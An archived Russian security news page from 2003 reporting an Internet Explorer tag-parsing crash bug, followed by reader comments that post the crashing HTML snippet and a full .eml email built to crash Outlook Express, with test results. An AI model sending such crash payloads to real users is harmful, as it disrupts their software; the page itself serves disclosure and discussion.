BugTraq.Ru
Русский BugTraq
http://www.bugtraq.ru/rsn/archive/2003/05/07.html

Пользователям IE опять пора бояться
cybervlad // 07.05.03 10:41
Обнаруженная ошибка при разборе тегов приводит к аварийному завершению программы.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/05/07.html]
Теперь для скрипт-кидди есть развлечение - рассылать e-mail в html-формате со злобными тегами...

Источник: The Inquirer    
предложить новость  |  обсудить  |  все отзывы (9) [5680]
назад «  » вперед

последние новости
Windows Defender записал во вредоносы все Electron и Chromium приложения // 05.09.22 00:09
Google начинает платить за найденные уязвимости // 31.08.22 20:16
Ростелеком заподозрили в попытке перехвате трафика Apple // 27.07.22 22:41
Линуксовый ботнет, распространяющийся с помощью краденых ssh-ключей // 19.06.22 00:37
Конец поддержки Internet Explorer // 15.06.22 00:00
Рекордное число уязвимостей в 2021 // 28.05.22 21:06
Блокировка российских аккаунтов на GitHub // 15.04.22 11:13

Комментарии:

Пользователям IE опять пора бояться 07.05.03 14:46  
Автор: zoonoid Статус: Незарегистрированный пользователь
<"чистая" ссылка>
<html>
<!-- > <input type code>
<body>
</body>
</html>
Спасибо дяде БГ :)
Не факт. 07.05.03 23:33  
Автор: JINN <Sergey> Статус: Elderman
<"чистая" ссылка>
> <html>
> <!-- > <input type code>
> <body>
> </body>
> </html>
> Спасибо дяде БГ :)

ИЕ 6.0 + патчи q319182, q324929 - ослик "не падает", умирает лишь окно, в котором был открыт crash.html.
А этого мало, что-ли? :)) 08.05.03 09:49  
Автор: Sandy <Alexander Stepanov> Статус: Elderman
<"чистая" ссылка>
Ну и толку? 08.05.03 09:54  
Автор: ZloyShaman <ZloyShaman> Статус: Elderman
<"чистая" ссылка>
Если выключено подтверждение на закрытие окна, то можно и window.close использовать ;))))
Одно дело окно просто закрылось, а другое - когда в ошибку выпало! :) 08.05.03 12:36  
Автор: Sandy <Alexander Stepanov> Статус: Elderman
<"чистая" ссылка>
а АутГлюк как? 12.05.03 07:54  
Автор: zoonoid Статус: Незарегистрированный пользователь
<"чистая" ссылка>
А может кто сможет этот код в HTML в АутГлюк вставить и рассказать падает он или нет?
А то у меня ломает винды ставить
Если само письмо было написано в формате HTML... 12.05.03 17:34  
Автор: HandleX <Александр М.> Статус: The Elderman
<"чистая" ссылка>
...и в этом HTML есть вышеуказанный зловредный код, то аутглюк должен красиво упасть, потому что при просмотре такого письма от подгружает IE как in-place OLE (ActiveX), и скорее всего в своём же адресном пространстве, поэтому исключение ослика завалит аутглюк...
Сегодня исследовал поведение этого почтовика... Аутглюк умирает, но не сдаётся ;-) 13.05.03 22:09  
Автор: HandleX <Александр М.> Статус: The Elderman
<"чистая" ссылка>
Если текст (ниже) вы сохраните в простом текстовом формате в файл с расширением *.eml, то сами сможете всё это посмотреть...

From: "Alex" <somebody@mail.ru>
To: <somebody@pisem.net>
Subject: =?koi8-r?B?6MXMzM8h?=
Date: Wed, 14 May 2003 00:37:03 +0700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0005_01C319B0.F09A7A20"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165

This is a multi-part message in MIME format.

------=_NextPart_000_0005_01C319B0.F09A7A20
Content-Type: text/plain;
	charset="koi8-r"
Content-Transfer-Encoding: quoted-printable

Hi!
------=_NextPart_000_0005_01C319B0.F09A7A20
Content-Type: text/html;
	charset="koi8-r"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Dkoi8-r">
<META content=3D"MSHTML 6.00.2800.1170" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD><FONT face=3DArial><FONT size=3D2>
<!-- > <INPUT TYPE CODE>
<BODY>
<DIV>Hi!</DIV></BODY></HTML></FONT></FONT>

------=_NextPart_000_0005_01C319B0.F09A7A20--

---
Ну и дальше в мелкософт как чувствовали, что может произойти такое. Если это письмо проводником с помощью drug&drop бросить во «входящие», то аутлук падает с ошибкой. Можно себе представить, что аутлук при повторной загрузке сразу открывает папку «входящие», а там опять это письмо ;-) Но вот что он показывает вместо письма в этом случае:
«Outlook Express did not shutdown correctly

The last time you ran Outlook Express it did not exit correctly. In case this was due to a problem with the last message you were viewing, the message is not being shown».

так что в M$ тоже не лохи ;-)
а АутГлюк как? 12.05.03 13:50  
Автор: JINN <Sergey> Статус: Elderman
Отредактировано 12.05.03 13:53  Количество правок: 1
<"чистая" ссылка>
> А может кто сможет этот код в HTML в АутГлюк вставить и
> рассказать падает он или нет?
> А то у меня ломает винды ставить
Создал в БАТе письмо, приаттачил файл crash.html, отправил себе же, забрал аутлуком почту, ткнул в аттач, ответил "Да, я хочу открыть вложение", открылось окно IE и тут же "упало" с сообщением
"Программа выполнила недопустимую операцию и будет закрыта" Сведения :
Программа EXPLORER вызвала сбой при обращении к странице памяти
в модуле SHLWAPI.DLL по адресу 0167:70bf4fee."

Отвечаем "Закрыть", получаем ещё одно сообщение "Произошла ошибка в IE. Работа обозревателя будет завершена. При повторении ошибки перезагрузите компьютер".

Жмём "ОК"- "зависнувшее" окно закрывается, работу можно продолжать-)
Добавлю : ВСЕ остальные окна и приложения при этом работают без проблем, в частности половина этого сообщения была написана при висящем предупреждении об ошибке.
Версия Аутлук-а 6.00.2600

Так что если повезёт найти адресата, у которого все настройки дефолтовые, типа "ВСЁ СРАЗУ открывать и ни о чём не предупреждать", баг можно использовать.
<добавить комментарий>



  Copyright © 2001-2022 Dmitry Leonov Design: Vadim Derkach